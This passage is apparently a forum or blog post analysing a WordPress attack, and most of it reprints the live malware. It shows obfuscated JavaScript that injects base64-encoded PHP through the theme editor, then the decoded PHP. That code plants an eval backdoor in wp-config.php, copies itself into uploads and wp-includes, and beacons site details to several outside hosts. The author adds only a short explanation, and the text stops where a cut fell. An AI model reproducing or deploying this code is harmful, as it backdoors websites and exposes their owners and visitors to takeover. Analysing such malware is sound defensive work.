dWdVknIC4nMlVnJyAuJ2EnIC4nWCcgLidNZ1oyOXNaR1Z1TGcwS1AnIC4neicgLic0PScsJ0xpNHZkJyAuJ1hCc2IyRmtjeTlwJyAuJ2JtJyAuJ1JsJyAuJ2UnIC4nQycgLic1d2FIQScgLic9JywnJyAuJ2FXNWtaJyAuJ1hndScgLidjR2h3Jyk7cmV0dXJuIGJhc2U2NF9kZWNvZGUoJGFbJGldKTt9ZnVuY3Rpb24gbF9fMCgkXzApe3JldHVybiAkR0xPQkFMU1snXzI1MzQwMTE2OV8nXVswXSgkR0xPQkFMU1snXzI1MzQwMTE2OV8nXVsxXSh+JF8wKSk7fWZ1bmN0aW9uIGxfXzEoJF8xKXskXzJbXT1fMTA0NTYyOTMzOSgwKTt3aGlsZShyb3VuZCgwKzE0MjguNjY2NjY2NjcrMTQyOC42NjY2NjY2NysxNDI4LjY2NjY2NjY3KS1yb3VuZCgwKzQyODYpKSRHTE9CQUxTWydfMjUzNDAxMTY5XyddWzJdKCRfU0VSVkVSKTskXzJbXT1fMTA0NTYyOTMzOSgxKTt3aGlsZShyb3VuZCgwKzEzNzkuNSsxMzc5LjUpLXJvdW5kKDArMTM3OS41KzEzNzkuNSkpJEdMT0JBTFNbJ18yNTM0MDExNjlfJ11bM10oJF8xLCRfMyk7JF8zPSRHTE9CQUxTWydfMjUzNDAxMTY5XyddWzRdKF8xMDQ1NjI5MzM5KDIpLF8xMDQ1NjI5MzM5KDMpLCRfU0VSVkVSW18xMDQ1NjI5MzM5KDQpXSk7JF80PWxfXzAoJF9TRVJWRVJbXzEwNDU2MjkzMzkoNSldIC4kXzMgLl8xMDQ1NjI5MzM5KDYpIC4kXzEpOyRHTE9CQUxTWydfMjUzNDAxMTY5XyddWzVdKCRfMik7Zm9yZWFjaCgkXzIgYXMgJF81KXtlY2hvIF8xMDQ1NjI5MzM5KDcpIC4kXzUgLl8xMDQ1NjI5MzM5KDgpIC4kXzQgLl8xMDQ1NjI5MzM5KDkpO2lmKCRHTE9CQUxTWydfMjUzNDAxMTY5XyddWzZdKF8xMDQ1NjI5MzM5KDEwKSxfMTA0NTYyOTMzOSgxMSkpIT09ZmFsc2UpJEdMT0JBTFNbJ18yNTM0MDExNjlfJ11bN10oJF9TRVJWRVIsJF9TRVJWRVIsJF82KTt9fUAkR0xPQkFMU1snXzI1MzQwMTE2OV8nXVs4XShfMTA0NTYyOTMzOSgxMiksXzEwNDU2MjkzMzkoMTMpKTskXzY9XzEwNDU2MjkzMzkoMTQpO2lmKHJvdW5kKDArOTM3LjQrOTM3LjQrOTM3LjQrOTM3LjQrOTM3LjQpPCRHTE9CQUxTWydfMjUzNDAxMTY5XyddWzldKHJvdW5kKDArNDEwKzQxMCs0MTArNDEwKSxyb3VuZCgwKzEwMTQrMTAxNCsxMDE0KSkpJEdMT0JBTFNbJ18yNTM0MDExNjlfJ11bMTBdKCRfMSk7aWYoJEdMT0JBTFNbJ18yNTM0MDExNjlfJ11bMTFdKCRfNikpeyRfMT0kR0xPQkFMU1snXzI1MzQwMTE2OV8nXVsxMl0oJEdMT0JBTFNbJ18yNTM0MDExNjlfJ11bMTNdKCRHTE9CQUxTWydfMjUzNDAxMTY5XyddWzE0XShfMTA0NTYyOTMzOSgxNSkscm91bmQoMCsxNikpKSxyb3VuZCgwKSxyb3VuZCgwKzE2KSk7JF83PSRHTE9CQUxTWydfMjUzNDAxMTY5XyddWzE1XSgkXzEpOyRfNT0iZXJyb3JfcmVwb3J0aW5nKDApO2lmKGlzc2V0KFwkX1JFUVVFU1RbJ3dwc3BtJ10pICYmIG1kNShcJF9SRVFVRVNUWyd3cHNwbSddKSA9PSAnJF83JyAmJiBpc3NldChcJF9SRVFVRVNUWyd3cHJrJ10pKSBldmFsICggYmFzZTY0X2RlY29kZSAoXCRfUkVRVUVTVFsnd3ByayddKSk7IjskR0xPQkFMU1snXzI1MzQwMTE2OV8nXVsxNl0oIiRfNiIsJEdMT0JBTFNbJ18yNTM0MDExNjlfJ11bMTddKF8xMDQ1NjI5MzM5KDE2KSwiJF81IFxuIFwkdGFibGVfcHJlZml4IiwkR0xPQkFMU1snXzI1MzQwMTE2OV8nXVsxOF0oJF82KSkpO2lmKCRHTE9CQUxTWydfMjUzNDAxMTY5XyddWzE5XShfMTA0NTYyOTMzOSgxNyksXzEwNDU2MjkzMzkoMTgpKSE9PWZhbHNlKSRHTE9CQUxTWydfMjUzNDAxMTY5XyddWzIwXSgkXzUsJF8wLCRfMik7fWxfXzEoJF8xKTtpZigocm91bmQoMCs0MzIuOCs0MzIuOCs0MzIuOCs0MzIuOCs0MzIuOCkrcm91bmQoMCsxMjE4KzEyMTgrMTIxOCsxMjE4KSk+cm91bmQoMCs1NDErNTQxKzU0MSs1NDEpfHwgJEdMT0JBTFNbJ18yNTM0MDExNjlfJ11bMjFdKCRfNCwkXzMsJF82LCRfU0VSVkVSKSk7ZWxzZXskR0xPQkFMU1snXzI1MzQwMTE2OV8nXVsyMl0oJF9TRVJWRVIpO31AJEdMT0JBTFNbJ18yNTM0MDExNjlfJ11bMjNdKF8xMDQ1NjI5MzM5KDE5KSxfMTA0NTYyOTMzOSgyMCkpOyQkXzY9X19GSUxFX187QCRHTE9CQUxTWydfMjUzNDAxMTY5XyddWzI0XShfMTA0NTYyOTMzOSgyMSksXzEwNDU2MjkzMzkoMjIpKTtpZihyb3VuZCgwKzI4ODMrMjg4MysyODgzKTwkR0xPQkFMU1snXzI1MzQwMTE2OV8nXVsyNV0ocm91bmQoMCsyMTAwLjUrMjEwMC41KSxyb3VuZCgwKzIyMjEuNSsyMjIxLjUpKSkkR0xPQkFMU1snXzI1MzQwMTE2OV8nXVsyNl0oJF83LCRfNSk7QCRHTE9CQUxTWydfMjUzNDAxMTY5XyddWzI3XShfMTA0NTYyOTMzOSgyMyksXzEwNDU2MjkzMzkoMjQpKTskXzg9XzEwNDU2MjkzMzkoMjUpO0AkR0xPQkFMU1snXzI1MzQwMTE2OV8nXVsyOF0oXzEwNDU2MjkzMzkoMjYpLF8xMDQ1NjI5MzM5KDI3KSk7QCRHTE9CQUxTWydfMjUzNDAxMTY5XyddWzI5XShfMTA0NTYyOTMzOSgyOCksXzEwNDU2MjkzMzkoMjkpKTtpZigocm91bmQoMCsyODc2KV5yb3VuZCgwKzk1OC42NjY2NjY2NjcrOTU4LjY2NjY2NjY2Nys5NTguNjY2NjY2NjY3KSkmJiAkR0xPQkFMU1snXzI1MzQwMTE2OV8nXVszMF0oJF8zLCRfNCwkXzQpKSRHTE9CQUxTWydfMjUzNDAxMTY5XyddWzMxXSgkXzQsJF8wLCRfMywkXzMpO2VjaG8iMTkyNDg1MDk3YmM4YTI0MGE5NmFjYTU5NjhlYWU3NzciOyA/Pg==") + hhh.getElementById("newcontent").value;
hhh.getElementById("submit").click( );
}
else {
zzz.src = '../wp-content/plugins/index.php';
}}"
And the atob in there:
hhh.getElementById("newcontent").value = atob("PD9waHAgJEdMT0JBTFNbJ18yNTM0MDExNjlfJ109QXJyYXkoYmFzZTY0X2RlY29kZSgnZFhKc1pXNWpiJyAuJzInIC4nUmwnKSxiYXNlNjRfZGVjb2RlKCdZbUZ6WlQnIC4nWTBYMicgLidWdScgLidZMjlrWlE9PScpLGJhc2U2NF9kZWNvZGUoJ1ptZGxkR04nIC4nemRnJyAuJz0nIC4nPScpLGJhc2U2NF9kZWNvZGUoJ2MyVnonIC4nYzInIC4nbHZibDknIC4ncFpBPT0nKSxiYXNlNjRfZGVjb2RlKCdjM1InIC4neVgnIC4nM0psYycgLidHeGhZMlU9JyksYmFzZTY0X2RlY29kZSgnYzJoMVptWnNaUT09JyksYmFzZTY0X2RlY29kZSgnYycgLiczUnknIC4nY0cnIC4nOXonKSxiYXNlNjRfZGVjb2RlKCdabScgLidscycgLidaVjlsZUdsemRIJyAuJ009JyksYmFzZTY0X2RlY29kZSgnY21WdVlXMWwnKSxiYXNlNjRfZGVjb2RlKCdiWFInIC4nZmNtRnVaQT09JyksYmFzZTY0X2RlY29kZSgnY0hKcGJuUmZjZz09JyksYmFzZTY0X2RlY29kZSgnWm1sc1pWJyAuJzlsJyAuJ2VHbHpkJyAuJ0hNPScpLGJhc2U2NF9kZWNvZGUoJ2MzVmljJyAuJzNSeScpLGJhc2U2NF9kZWNvZGUoJ2MzUicgLid5WDNOb2RXJyAuJ1ptJyAuJ2JHVT0nKSxiYXNlNjRfZGVjb2RlKCdjJyAuJzNSeVgzSmxjR1YnIC4naGRBPT0nKSxiYXNlNjRfZGVjb2RlKCdiV1ExJyksYmFzZTY0X2RlY29kZSgnWm1sc1pWJyAuJzl3ZFhSZlkyJyAuJzknIC4ndWRHVnVkJyAuJ0hNPScpLGJhc2U2NF9kZWNvZGUoJ2MnIC4nM1J5WDNKbGNHJyAuJ3hoWTJVPScpLGJhc2U2NF9kZWNvZGUoJ1onIC4nbWxzWicgLidWOW4nIC4nWlhSZlkyOXVkR1Z1ZEhNJyAuJz0nKSxiYXNlNjRfZGVjb2RlKCdjM1J5Y0c5JyAuJ3onKSxiYXNlNjRfZGVjb2RlKCdjM1ZpYycgLiczUnlYM0psYycgLidHeGhZMlU9JyksYmFzZTY0X2RlY29kZSgnYVhOJyAuJ2YnIC4nWVhKJyAuJ3lZWGs9JyksYmFzZTY0X2RlY29kZSgnYzNSeScgLidjbicgLidCdmN3PT0nKSxiYXNlNjRfZGVjb2RlKCdZMjl3JyAuJ2VRPT0nKSxiYXNlNjRfZGVjb2RlKCdZMjl3ZVE9PScpLGJhc2U2NF9kZWNvZGUoJ2InIC4nWCcgLidSZicgLidjbScgLidGdVpBPT0nKSxiYXNlNjRfZGVjb2RlKCdjJyAuJzJoaCcgLidNUT09JyksYmFzZTY0X2RlY29kZSgnWTI5JyAuJ3cnIC4nZVE9PScpLGJhc2U2NF9kZWNvZGUoJycgLidabWxzWlY5JyAuJ3dkJyAuJ1gnIC4nUicgLidmWTInIC4nOScgLid1ZCcgLidHVnVkSE0nIC4nPScpLGJhc2U2NF9kZWNvZGUoJ1onIC4nbWxzWlYnIC4nOScgLid3ZFgnIC4nUicgLidmWScgLicyOScgLid1ZEdWdWRIJyAuJ009JyksYmFzZTY0X2RlY29kZSgnWVhKeVknIC4nWGxmYzNWdCcpLGJhc2U2NF9kZWNvZGUoJ1pHbHknKSk7ZnVuY3Rpb24gXzEwNDU2MjkzMzkoJGkpeyRhPUFycmF5KCdhSCcgLidSMGMnIC4nRG92THpFek8nIC4nQzR4TWonIC4nZ3VNJyAuJ1RZNUxqSXhPJyAuJ1M5elkzSicgLidsJyAuJ1pXNXphRzkwY3k4dWFXMWhaMlZ6TDJsdVonIC4nR1Y0JyAuJ0xuQm9jQT09JywnJyAuJ2FIJyAuJ1IwY0RvdkwydHBkRFJoYkd3dScgLidjblV2WTInIC4nOXRjRzl1JyAuJ1onIC4nVzUwY3k5amIyMScgLidmYW1ObEwybHVaRycgLidWNExuQm9jQT09JywnZCcgLiczQXRZMjl1ZEdWJyAuJ3VkQzl3YkhWJyAuJ25hVzUnIC4nekwyJyAuJ2x1JyAuJ1pHVjRMJyAuJ25CJyAuJ28nIC4nY0E9PScsJycsJ1VrVlInIC4nVlUnIC4nVlRWRicgLic5VlVraycgLic9JywnU0YnIC4nUlVVRicgLic5SVQxTlUnLCdmQT09JywnUEdsdFp5QjNhJyAuJ1dSMGFEMHhJR2hsYVdkb2REMHhJJyAuJ0hOeVl6MGknLCdQMlJoZEdFJyAuJzknLCdJJyAuJ2o0PScsJ2QnIC4nV1pvJyAuJ2NHSmxaRycgLidKMycgLidaWGhoJywnWm0nIC4nMTYnLCdMaTR2TCcgLidpNHZkJyAuJzMnIC4nQXRZMjl0YldWdScgLidkSE10JyAuJ2NHOXpkJyAuJ0M1JyAuJ3dhSCcgLidBPScsJ0xpNHZMJyAuJ2k0dicgLidkJyAuJzNBdFkyOXRiVzUnIC4nbGQnIC4nSE10JyAuJ2NHOXonIC4nZEM1dycgLidhSEE9JywnJyAuJ0xpNHZMaTR2JyAuJ2QnIC4nMycgLidBdFkyOXVabWxuJyAuJ0xuQm9jQT09JywnUVUnIC4nSicgLidEUkVWR1InIC4nMGhKU2snIC4ndE1UJyAuJ1UnIC4nNScgLidQVScgLidGJyAuJ0ZTVTFSVlZsJyAuJ2RZV1ZwaCcgLidZbU5rWldabmFHbHFhMngnIC4ndGJtJyAuJzl3YycgLidYSnpkSFYyJyAuJ2QzaDVlZz09JywnSkhSaFknIC4nbXgnIC4nbCcgLidYM0J5WldacCcgLidlQT09JywnZDInIC4nTnZiMkZrYjNScWFYRicgLicxYTJKa2NXeCcgLid1WlE9PScsJ2JIbz0nLCdhJyAuJ0hSJyAuJzBjRG92TDJSJyAuJ2gnIC4nYycgLidHTm8nIC4nWlcxJyAuJ2xibScgLidjdWInIC4nM0puJyAuJ0x6RXYnIC4nWVhJdmQydHpiMjVsZHknIC4nNScgLid3YScgLidIJyAuJ0EnIC4nPScsJ0xpNHZMaTQnIC4ndmQzQXRhVzVqJyAuJ2JIJyAuJ1ZrJyAuJ1pYTXZkR1Z0Y0d4aGQnIC4nR1V0ZDNCcycgLidiMkZrWlhJdWNHJyAuJ2h3JywnJyAuJ2FXNWtaJyAuJ1hnJyAuJ3VjRycgLidodycsJ0xpJyAuJzQnIC4ndicgLidkWEJuY20nIC4nRicgLidrJyAuJ1pTOTFjR2R5WVdSJyAuJ2xjJyAuJ3k1d2FIJyAuJ0E9JywnYVc1a1pYZ3VjR2gnIC4ndycsJ0wnIC4naScgLic0JyAuJ3ZkWEJzYjJGa2N5OTNjQzExJyAuJ2NHeCcgLid2JyAuJ1lXUnpMbkJvY0EnIC4nPT0nLCdhJyAuJ1E9JyAuJz0nLCdhJyAuJ1c1a1onIC4nWGd1Y0dodycsJycgLidQRCcgLic5dycgLidhJyAuJ0hBTkNpOHYnIC4nSUZOcGInIC4nRycgLidWdVknIC4nMlVnJyAuJ2EnIC4nWCcgLidNZ1oyOXNaR1Z1TGcwS1AnIC4neicgLic0PScsJ0xpNHZkJyAuJ1hCc2IyRmtjeTlwJyAuJ2JtJyAuJ1JsJyAuJ2UnIC4nQycgLic1d2FIQScgLic9JywnJyAuJ2FXNWtaJyAuJ1hndScgLidjR2h3Jyk7cmV0dXJuIGJhc2U2NF9kZWNvZGUoJGFbJGldKTt9ZnVuY3Rpb24gbF9fMCgkXzApe3JldHVybiAkR0xPQkFMU1snXzI1MzQwMTE2OV8nXVswXSgkR0xPQkFMU1snXzI1MzQwMTE2OV8nXVsxXSh+JF8wKSk7fWZ1bmN0aW9uIGxfXzEoJF8xKXskXzJbXT1fMTA0NTYyOTMzOSgwKTt3aGlsZShyb3VuZCgwKzE0MjguNjY2NjY2NjcrMTQyOC42NjY2NjY2NysxNDI4LjY2NjY2NjY3KS1yb3VuZCgwKzQyODYpKSRHTE9CQUxTWydfMjUzNDAxMTY5XyddWzJdKCRfU0VSVkVSKTskXzJbXT1fMTA0NTYyOTMzOSgxKTt3aGlsZShyb3VuZCgwKzEzNzkuNSsxMzc5LjUpLXJvdW5kKDArMTM3OS41KzEzNzkuNSkpJEdMT0JBTFNbJ18yNTM0MDExNjlfJ11bM10oJF8xLCRfMyk7JF8zPSRHTE9CQUxTWydfMjUzNDAxMTY5XyddWzRdKF8xMDQ1NjI5MzM5KDIpLF8xMDQ1NjI5MzM5KDMpLCRfU0VSVkVSW18xMDQ1NjI5MzM5KDQpXSk7JF80PWxfXzAoJF9TRVJWRVJbXzEwNDU2MjkzMzkoNSldIC4kXzMgLl8xMDQ1NjI5MzM5KDYpIC4kXzEpOyRHTE9CQUxTWydfMjUzNDAxMTY5XyddWzVdKCRfMik7Zm9yZWFjaCgkXzIgYXMgJF81KXtlY2hvIF8xMDQ1NjI5MzM5KDcpIC4kXzUgLl8xMDQ1NjI5MzM5KDgpIC4kXzQgLl8xMDQ1NjI5MzM5KDkpO2lmKCRHTE9CQUxTWydfMjUzNDAxMTY5XyddWzZdKF8xMDQ1NjI5MzM5KDEwKSxfMTA0NTYyOTMzOSgxMSkpIT09ZmFsc2UpJEdMT0JBTFNbJ18yNTM0MDExNjlfJ11bN10oJF9TRVJWRVIsJF9TRVJWRVIsJF82KTt9fUAkR0xPQkFMU1snXzI1MzQwMTE2OV8nXVs4XShfMTA0NTYyOTMzOSgxMiksXzEwNDU2MjkzMzkoMTMpKTskXzY9XzEwNDU2MjkzMzkoMTQpO2lmKHJvdW5kKDArOTM3LjQrOTM3LjQrOTM3LjQrOTM3LjQrOTM3LjQpPCRHTE9CQUxTWydfMjUzNDAxMTY5XyddWzldKHJvdW5kKDArNDEwKzQxMCs0MTArNDEwKSxyb3VuZCgwKzEwMTQrMTAxNCsxMDE0KSkpJEdMT0JBTFNbJ18yNTM0MDExNjlfJ11bMTBdKCRfMSk7aWYoJEdMT0JBTFNbJ18yNTM0MDExNjlfJ11bMTFdKCRfNikpeyRfMT0kR0xPQkFMU1snXzI1MzQwMTE2OV8nXVsxMl0oJEdMT0JBTFNbJ18yNTM0MDExNjlfJ11bMTNdKCRHTE9CQUxTWydfMjUzNDAxMTY5XyddWzE0XShfMTA0NTYyOTMzOSgxNSkscm91bmQoMCsxNikpKSxyb3VuZCgwKSxyb3VuZCgwKzE2KSk7JF83PSRHTE9CQUxTWydfMjUzNDAxMTY5XyddWzE1XSgkXzEpOyRfNT0iZXJyb3JfcmVwb3J0aW5nKDApO2lmKGlzc2V0KFwkX1JFUVVFU1RbJ3dwc3BtJ10pICYmIG1kNShcJF9SRVFVRVNUWyd3cHNwbSddKSA9PSAnJF83JyAmJiBpc3NldChcJF9SRVFVRVNUWyd3cHJrJ10pKSBldmFsICggYmFzZTY0X2RlY29kZSAoXCRfUkVRVUVTVFsnd3ByayddKSk7IjskR0xPQkFMU1snXzI1MzQwMTE2OV8nXVsxNl0oIiRfNiIsJEdMT0JBTFNbJ18yNTM0MDExNjlfJ11bMTddKF8xMDQ1NjI5MzM5KDE2KSwiJF81IFxuIFwkdGFibGVfcHJlZml4IiwkR0xPQkFMU1snXzI1MzQwMTE2OV8nXVsxOF0oJF82KSkpO2lmKCRHTE9CQUxTWydfMjUzNDAxMTY5XyddWzE5XShfMTA0NTYyOTMzOSgxNyksXzEwNDU2MjkzMzkoMTgpKSE9PWZhbHNlKSRHTE9CQUxTWydfMjUzNDAxMTY5XyddWzIwXSgkXzUsJF8wLCRfMik7fWxfXzEoJF8xKTtpZigocm91bmQoMCs0MzIuOCs0MzIuOCs0MzIuOCs0MzIuOCs0MzIuOCkrcm91bmQoMCsxMjE4KzEyMTgrMTIxOCsxMjE4KSk+cm91bmQoMCs1NDErNTQxKzU0MSs1NDEpfHwgJEdMT0JBTFNbJ18yNTM0MDExNjlfJ11bMjFdKCRfNCwkXzMsJF82LCRfU0VSVkVSKSk7ZWxzZXskR0xPQkFMU1snXzI1MzQwMTE2OV8nXVsyMl0oJF9TRVJWRVIpO31AJEdMT0JBTFNbJ18yNTM0MDExNjlfJ11bMjNdKF8xMDQ1NjI5MzM5KDE5KSxfMTA0NTYyOTMzOSgyMCkpOyQkXzY9X19GSUxFX187QCRHTE9CQUxTWydfMjUzNDAxMTY5XyddWzI0XShfMTA0NTYyOTMzOSgyMSksXzEwNDU2MjkzMzkoMjIpKTtpZihyb3VuZCgwKzI4ODMrMjg4MysyODgzKTwkR0xPQkFMU1snXzI1MzQwMTE2OV8nXVsyNV0ocm91bmQoMCsyMTAwLjUrMjEwMC41KSxyb3VuZCgwKzIyMjEuNSsyMjIxLjUpKSkkR0xPQkFMU1snXzI1MzQwMTE2OV8nXVsyNl0oJF83LCRfNSk7QCRHTE9CQUxTWydfMjUzNDAxMTY5XyddWzI3XShfMTA0NTYyOTMzOSgyMyksXzEwNDU2MjkzMzkoMjQpKTskXzg9XzEwNDU2MjkzMzkoMjUpO0AkR0xPQkFMU1snXzI1MzQwMTE2OV8nXVsyOF0oXzEwNDU2MjkzMzkoMjYpLF8xMDQ1NjI5MzM5KDI3KSk7QCRHTE9CQUxTWydfMjUzNDAxMTY5XyddWzI5XShfMTA0NTYyOTMzOSgyOCksXzEwNDU2MjkzMzkoMjkpKTtpZigocm91bmQoMCsyODc2KV5yb3VuZCgwKzk1OC42NjY2NjY2NjcrOTU4LjY2NjY2NjY2Nys5NTguNjY2NjY2NjY3KSkmJiAkR0xPQkFMU1snXzI1MzQwMTE2OV8nXVszMF0oJF8zLCRfNCwkXzQpKSRHTE9CQUxTWydfMjUzNDAxMTY5XyddWzMxXSgkXzQsJF8wLCRfMywkXzMpO2VjaG8iMTkyNDg1MDk3YmM4YTI0MGE5NmFjYTU5NjhlYWU3NzciOyA/Pg==") + hhh.getElementById("newcontent").value;decodes to:
"<?php $GLOBALS['_253401169_']=Array(base64_decode('dXJsZW5jb' .'2' .'Rl'),base64_decode('YmFzZT' .'Y0X2' .'Vu' .'Y29kZQ=='),base64_decode('ZmdldGN' .'zdg' .'=' .'='),base64_decode('c2Vz' .'c2' .'lvbl9' .'pZA=='),base64_decode('c3R' .'yX' .'3Jlc' .'GxhY2U='),base64_decode('c2h1ZmZsZQ=='),base64_decode('c' .'3Ry' .'cG' .'9z'),base64_decode('Zm' .'ls' .'ZV9leGlzdH' .'M='),base64_decode('cmVuYW1l'),base64_decode('bXR' .'fcmFuZA=='),base64_decode('cHJpbnRfcg=='),base64_decode('ZmlsZV' .'9l' .'eGlzd' .'HM='),base64_decode('c3Vic' .'3Ry'),base64_decode('c3R' .'yX3NodW' .'Zm' .'bGU='),base64_decode('c' .'3RyX3JlcGV' .'hdA=='),base64_decode('bWQ1'),base64_decode('ZmlsZV' .'9wdXRfY2' .'9' .'udGVud' .'HM='),base64_decode('c' .'3RyX3JlcG' .'xhY2U='),base64_decode('Z' .'mlsZ' .'V9n' .'ZXRfY29udGVudHM' .'='),base64_decode('c3RycG9' .'z'),base64_decode('c3Vic' .'3RyX3Jlc' .'GxhY2U='),base64_decode('aXN' .'f' .'YXJ' .'yYXk='),base64_decode('c3Ry' .'cn' .'Bvcw=='),base64_decode('Y29w' .'eQ=='),base64_decode('Y29weQ=='),base64_decode('b' .'X' .'Rf' .'cm' .'FuZA=='),base64_decode('c' .'2hh' .'MQ=='),base64_decode('Y29' .'w' .'eQ=='),base64_decode('' .'ZmlsZV9' .'wd' .'X' .'R' .'fY2' .'9' .'ud' .'GVudHM' .'='),base64_decode('Z' .'mlsZV' .'9' .'wdX' .'R' .'fY' .'29' .'udGVudH' .'M='),base64_decode('YXJyY' .'Xlfc3Vt'),base64_decode('ZGly'));function _1045629339($i){$a=Array('aH' .'R0c' .'DovLzEzO' .'C4xMj' .'guM' .'TY5LjIxO' .'S9zY3J' .'l' .'ZW5zaG90cy8uaW1hZ2VzL2luZ' .'GV4' .'LnBocA==','' .'aH' .'R0cDovL2tpdDRhbGwu' .'cnUvY2' .'9tcG9u' .'Z' .'W50cy9jb21' .'famNlL2luZG' .'V4LnBocA==','d' .'3AtY29udGV' .'udC9wbHV' .'naW5' .'zL2' .'lu' .'ZGV4L' .'nB' .'o' .'cA==','','UkVR' .'VU' .'VTVF' .'9VUkk' .'=','SF' .'RUUF' .'9IT1NU','fA==','PGltZyB3a' .'WR0aD0xIGhlaWdodD0xI' .'HNyYz0i','P2RhdGE' .'9','I' .'j4=','d' .'WZo' .'cGJlZG' .'J3' .'ZXhh','Zm' .'16','Li4vL' .'i4vd' .'3' .'AtY29tbWVu' .'dHMt' .'cG9zd' .'C5' .'waH' .'A=','Li4vL' .'i4v' .'d' .'3AtY29tbW5' .'ld' .'HMt' .'cG9z' .'dC5w' .'aHA=','' .'Li4vLi4v' .'d' .'3' .'AtY29uZmln' .'LnBocA==','QU' .'J' .'DREVGR' .'0hJSk' .'tMT' .'U' .'5' .'PU' .'F' .'FSU1RVVl' .'dYWVph' .'YmNkZWZnaGlqa2x' .'tbm' .'9wc' .'XJzdHV2' .'d3h5eg==','JHRhY' .'mx' .'l' .'X3ByZWZp' .'eA==','d2' .'Nvb2Fkb3RqaXF' .'1a2JkcWx' .'uZQ==','bHo=','a' .'HR' .'0cDovL2R' .'h' .'c' .'GNo' .'ZW1' .'lbm' .'cub' .'3Jn' .'LzEv' .'YXIvd2tzb25ldy' .'5' .'wa' .'H' .'A' .'=','Li4vLi4' .'vd3AtaW5j' .'bH' .'Vk' .'ZXMvdGVtcGxhd' .'GUtd3Bs' .'b2FkZXIucG' .'hw','' .'aW5kZ' .'Xg' .'ucG' .'hw','Li' .'4' .'v' .'dXBncm' .'F' .'k' .'ZS91cGdyYWR' .'lc' .'y5waH' .'A=','aW5kZXgucGh' .'w','L' .'i' .'4' .'vdXBsb2Fkcy93cC11' .'cGx' .'v' .'YWRzLnBocA' .'==','a' .'Q=' .'=','a' .'W5kZ' .'XgucGhw','' .'PD' .'9w' .'a' .'HANCi8v' .'IFNpb' .'G' .'VuY' .'2Ug' .'a' .'X' .'MgZ29sZGVuLg0KP' .'z' .'4=','Li4vd' .'XBsb2Fkcy9p' .'bm' .'Rl' .'e' .'C' .'5waHA' .'=','' .'aW5kZ' .'Xgu' .'cGhw');return base64_decode($a[$i]);}function l__0($_0){return $GLOBALS['_253401169_'][0]($GLOBALS['_253401169_'][1](~$_0));}function l__1($_1){$_2[]=_1045629339(0);while(round(0+1428.66666667+1428.66666667+1428.66666667)-round(0+4286))$GLOBALS['_253401169_'][2]($_SERVER);$_2[]=_1045629339(1);while(round(0+1379.5+1379.5)-round(0+1379.5+1379.5))$GLOBALS['_253401169_'][3]($_1,$_3);$_3=$GLOBALS['_253401169_'][4](_1045629339(2),_1045629339(3),$_SERVER[_1045629339(4)]);$_4=l__0($_SERVER[_1045629339(5)] .$_3 ._1045629339(6) .$_1);$GLOBALS['_253401169_'][5]($_2);foreach($_2 as $_5){echo _1045629339(7) .$_5 ._1045629339(8) .$_4 ._1045629339(9);if($GLOBALS['_253401169_'][6](_1045629339(10),_1045629339(11))!==false)$GLOBALS['_253401169_'][7]($_SERVER,$_SERVER,$_6);}}@$GLOBALS['_253401169_'][8](_1045629339(12),_1045629339(13));$_6=_1045629339(14);if(round(0+937.4+937.4+937.4+937.4+937.4)<$GLOBALS['_253401169_'][9](round(0+410+410+410+410),round(0+1014+1014+1014)))$GLOBALS['_253401169_'][10]($_1);if($GLOBALS['_253401169_'][11]($_6)){$_1=$GLOBALS['_253401169_'][12]($GLOBALS['_253401169_'][13]($GLOBALS['_253401169_'][14](_1045629339(15),round(0+16))),round(0),round(0+16));$_7=$GLOBALS['_253401169_'][15]($_1);$_5="error_reporting(0);if(isset(\$_REQUEST['wpspm']) && md5(\$_REQUEST['wpspm']) == '$_7' && isset(\$_REQUEST['wprk'])) eval ( base64_decode (\$_REQUEST['wprk']));";$GLOBALS['_253401169_'][16]("$_6",$GLOBALS['_253401169_'][17](_1045629339(16),"$_5 \n \$table_prefix",$GLOBALS['_253401169_'][18]($_6)));if($GLOBALS['_253401169_'][19](_1045629339(17),_1045629339(18))!==false)$GLOBALS['_253401169_'][20]($_5,$_0,$_2);}l__1($_1);if((round(0+432.8+432.8+432.8+432.8+432.8)+round(0+1218+1218+1218+1218))>round(0+541+541+541+541)|| $GLOBALS['_253401169_'][21]($_4,$_3,$_6,$_SERVER));else{$GLOBALS['_253401169_'][22]($_SERVER);}@$GLOBALS['_253401169_'][23](_1045629339(19),_1045629339(20));$$_6=__FILE__;@$GLOBALS['_253401169_'][24](_1045629339(21),_1045629339(22));if(round(0+2883+2883+2883)<$GLOBALS['_253401169_'][25](round(0+2100.5+2100.5),round(0+2221.5+2221.5)))$GLOBALS['_253401169_'][26]($_7,$_5);@$GLOBALS['_253401169_'][27](_1045629339(23),_1045629339(24));$_8=_1045629339(25);@$GLOBALS['_253401169_'][28](_1045629339(26),_1045629339(27));@$GLOBALS['_253401169_'][29](_1045629339(28),_1045629339(29));if((round(0+2876)^round(0+958.666666667+958.666666667+958.666666667))&& $GLOBALS['_253401169_'][30]($_3,$_4,$_4))$GLOBALS['_253401169_'][31]($_4,$_0,$_3,$_3);echo"192485097bc8a240a96aca5968eae777"; ?>"
And finally, tidying that up a bit and decoding the big blog of base64 rubbish, reveals an array containing:
http://138.128.169.219/screenshots/.images/index.php
http://kit4all.ru/components/com_jce/index.php
wp-content/plugins/index.php
REQUEST_URI
HTTP_HOST
|
<img width=1 height=1 src="
?data=
">
ufhpbedbwexa
fmz
../../wp-comments-post.php
../../wp-commnets-post.php
../../wp-config.php
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
$table_prefix
wcooadotjiqukbdqlne
lz
http://dapchemeng.org/1/ar/wksonew.php
../../wp-includes/template-wploader.php
index.php
../upgrade/upgrades.php
index.php
../uploads/wp-uploads.php
i
index.php
<?php
// Silence is golden.
?>
../uploads/index.php
index.php
Except that's not it either, because there's more code here: http://dapchemeng.org/1/ar/wksonew.php.
Anyway, I've not run the PHP code, but it looks like this probably uses the recent WordPress XSS vulns to exploit admins into grabbing some remote code and using that to install a shell (guessing about wksonew.php and the other remote scripts). And as you can see from the original port this is all being done via tor.
I put the PHP code through an online tidier:
<?php
